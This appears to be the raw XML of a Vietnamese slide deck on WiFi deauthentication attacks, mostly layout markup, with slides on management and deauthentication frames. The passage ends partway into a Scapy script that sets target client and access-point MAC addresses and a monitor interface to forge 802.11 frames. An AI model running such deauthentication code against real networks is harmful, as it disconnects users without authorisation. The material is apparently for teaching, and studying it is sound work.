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Happy Font TH" panose="020B0604020202020204" charset="-34"/>
      <p:regular r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Open Sauce Bold" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId39"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Paytone One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341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2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24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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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Relationship Id="rId2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2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24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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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Relationship Id="rId2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2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10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24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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39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Relationship Id="rId2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2.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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1.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.sv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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.svg"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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2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24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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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Relationship Id="rId2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3.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.svg"/><Relationship Id="rId21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10.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28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9.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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42.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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29.svg"/><Relationship Id="rId21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10.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.pn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14.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.sv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Relationship Id="rId2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svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.pn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4.jpe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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.png"/><Relationship Id="rId19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19.png"/><Relationship Id="rId22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43.svg"/><Relationship Id="rId21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14.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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24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10.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.sv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Relationship Id="rId2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24.sv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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image23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29.svg"/><Relationship Id="rId21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14.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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24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10.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.sv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Relationship Id="rId2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29.svg"/><Relationship Id="rId21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14.svg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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24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10.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.sv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Relationship Id="rId2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29.sv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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28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29.sv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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28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svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.svg"/><Relationship Id="rId21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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.pn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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image15.pn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19.png"/><Relationship Id="rId2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18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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5.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image46.pn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24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Relationship Id="rId22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14.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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13.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.sv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Relationship Id="rId22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4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2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9.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image27.svg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12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11.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image21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14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId22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5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5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5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8.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.svg"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image57.sv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.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image56.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId2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8.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.sv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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11.png"/><Relationship Id="rId2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8.svg"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image17.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.svg"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.svg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image14.svg"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image16.sv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.svg"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image60.gif"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.svg"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image12.svg"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.svg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image18.svg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.svg"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image11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6.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image29.sv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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image28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30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3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3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30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3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30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3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30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32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35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0468" y="1360004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6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1829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95029" y="1360004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03306" y="2305519"/>
            <a:ext cx="15481388" cy="4200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TẤN CÔNG </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="16800"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="120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NGẮT KẾT NỐI WIFI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2405" y="1527534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1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1996661" y="1829666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1829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04634" y="290009"/>
            <a:ext cx="2613190" cy="2199831"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2613190" h="2199831">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2613191" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2613191" y="2199831"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21998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05548" y="1028700"/>
            <a:ext cx="5995806" cy="4234902"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5995806" h="4234902">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5995806" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5995806" y="4234902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="423490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65803" y="3820243"/>
            <a:ext cx="1393497" cy="1443358"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1393497" h="1443358">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1393497" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1393497" y="1443359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="144335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57673" y="5966877"/>
            <a:ext cx="15172654" cy="3141689"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15172654" h="3141689">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15172654" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15172654" y="3141689"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3141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09065" y="2640330"/>
            <a:ext cx="5895751" cy="2503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WIFI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="10080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7200" dirty="0" err="1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Xác</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="72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7200" dirty="0" err="1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thực</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="7200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="449FA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0272" y="261753"/>
            <a:ext cx="1673892" cy="1533893"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1673892" h="1533893">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1673891" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1673891" y="1533894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="153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94436" y="510649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1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3052911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14163" y="2301908"/>
            <a:ext cx="12459674" cy="7029134"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12459674" h="7029134">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12459674" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12459674" y="7029134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="702913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b="-3266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886892" y="6340603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4000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1634000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894653" y="568827"/>
            <a:ext cx="10498695" cy="12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Management Frame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28700" y="351073"/>
            <a:ext cx="2353695" cy="2156841"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2353695" h="2156841">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2353695" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2353695" y="2156841"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2156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43806" y="180360"/>
            <a:ext cx="2015494" cy="1696680"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2015494" h="1696680">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2015494" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2015494" y="1696680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16966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14163" y="2301908"/>
            <a:ext cx="12459674" cy="7029134"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12459674" h="7029134">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12459674" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12459674" y="7029134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="702913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b="-3266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85197" y="2302001"/>
            <a:ext cx="13117605" cy="7444241"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="13117605" h="7444241">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="13117606" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13117606" y="7444241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="744424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214853" y="4124009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171DEE97-4E93-D766-5C2F-55723BB21DE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3894653" y="568827"/>
            <a:ext cx="10498695" cy="12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Management Frame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3048" y="3692617"/>
            <a:ext cx="14820615" cy="4761471"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14820615" h="4761471">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="14820615" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14820615" y="4761471"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4761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24337" y="1808572"/>
            <a:ext cx="148393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Deauthentication Frame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0468" y="472892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6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1829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26033" y="-651057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1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3052911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61967" y="2179696"/>
            <a:ext cx="10964067" cy="7428155"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10964067" h="7428155">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10964066" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10964066" y="7428156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="742815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624853" y="478779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24337" y="707640"/>
            <a:ext cx="148393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Deauthentication Frame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2649" y="2338772"/>
            <a:ext cx="10632617" cy="10621506"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10632617" h="10621506">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10632617" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10632617" y="10621507"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1062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92699" y="10152861"/>
            <a:ext cx="1365188" cy="1305616"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1365188" h="1305616">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1365188" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1365188" y="1305616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1305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86065" y="9026657"/>
            <a:ext cx="6065956" cy="4410290"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6065956" h="4410290">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6065956" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6065956" y="4410290"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4410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07565" y="9026657"/>
            <a:ext cx="6618159" cy="5607386"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6618159" h="5607386">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6618159" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6618159" y="5607386"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5607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46056" y="9391960"/>
            <a:ext cx="6205576" cy="6149162"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6205576" h="6149162">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6205577" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6205577" y="6149162"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="61491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81110" y="-878515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1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3052911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95726" y="9237783"/>
            <a:ext cx="6539525" cy="4292306"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6539525" h="4292306">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6539525" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6539525" y="4292306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42923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746293" y="9798857"/>
            <a:ext cx="1962761" cy="1188363"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1962761" h="1188363">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1962761" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1962761" y="1188363"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="118836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51633" y="9959826"/>
            <a:ext cx="3497543" cy="3570263"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3497543" h="3570263">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3497543" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3497543" y="3570263"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35702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037599" y="10152861"/>
            <a:ext cx="2714658" cy="2908878"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2714658" h="2908878">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2714658" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2714658" y="2908877"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="290887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310830" y="2898235"/>
            <a:ext cx="10117138" cy="604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839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scapy.all import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3975"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2839" b="1">
              <a:solidFill>
                <a:srgbClr val="449FA2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975"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839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client_mac = "66:77:88:99:AA:BB"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3975"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839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ap_mac = "00:11:22:33:44:55"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3975"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839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iface = "wlan0mon"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3975"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839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dot11 = Dot11(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3975"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2839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addr1=client_mac, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
